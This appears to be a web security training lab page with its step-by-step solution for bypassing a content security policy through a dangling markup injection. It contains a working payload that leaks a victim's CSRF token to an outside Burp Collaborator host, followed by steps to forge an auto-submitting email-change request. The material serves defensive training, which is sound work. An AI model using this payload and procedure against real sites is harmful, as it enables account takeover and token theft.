Lab: Reflected XSS protected by CSP, with dangling markup attack

PRACTITIONER

This lab uses CSP to mitigate against XSS attacks.

To solve the lab, perform a dangling markup attack that steals a CSRF token and uses it to change the email address of another user. You can use the following credentials to log in for testing:

Username: wiener
Password: peter

Access the lab

Solution

Log in to the lab using the account provided above.
Examine the change email function. Observe that there is an XSS vulnerability in the email parameter.
Go to the Burp menu and launch the Burp Collaborator client.
Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open.
Back in the lab, go to the exploit server and add the following code, replacing your-lab-id with your lab ID, and replacing your-collaborator-id with the payload that you just copied from Burp Collaborator.
<script>
location='https://your-lab-id.web-security-academy.net/email?email=%22%3E%3Ctable%20background=%27//your-collaborator-id.burpcollaborator.net?';
</script>
Click "Store" and then "Deliver exploit to victim". If the target user visits the website containing this malicious script while they are still logged in to the lab website, their browser will send a request containing their CSRF token to your malicious website. You can then steal this token using the Burp Collaborator client.
Go back to the Burp Collaborator client window, and click "Poll now". If you don't see any interactions listed, wait a few seconds and try again. You should see an HTTP interaction that was initiated by the application. Select the HTTP interaction, go to the request tab, and copy the user's CSRF token.
With Burp's Intercept feature switched on, go back to the change email function of the lab and submit a request to change the email to any random address.
In Burp, go to the intercepted request and change the value of the email parameter to hacker@evil-user.net.
Right-click on the request and, from the context menu, select "Engagement tools" and then "Generate CSRF PoC". The popup shows both the request and the CSRF HTML that is generated by it. In the request, replace the CSRF token with the one that you stole from the victim earlier.
Click "Options" and make sure that the "Include auto-submit script" is activated.
Click "Regenerate" to update the CSRF HTML so that it contains the stolen token, then click "Copy HTML" to save it to your clipboard.
Go back to the exploit server and paste the CSRF HTML into the body. You can overwrite the script that we entered earlier.
Click "Store" and "Deliver exploit to victim". The user's email will be changed to hacker@evil-user.net.

Want to track your progress and have a more personalized learning experience? (It's free!)

In this topic

Cross-site scripting Reflected XSS Stored XSS DOM-based XSS XSS contexts AngularJS sandbox Exploiting XSS vulnerabilities Content security policy Dangling markup Preventing XSS XSS cheat sheet

All topics

SQL injection XSS CSRF Clickjacking DOM-based CORS XXE SSRF Request smuggling Command injection Directory traversal Access control WebSockets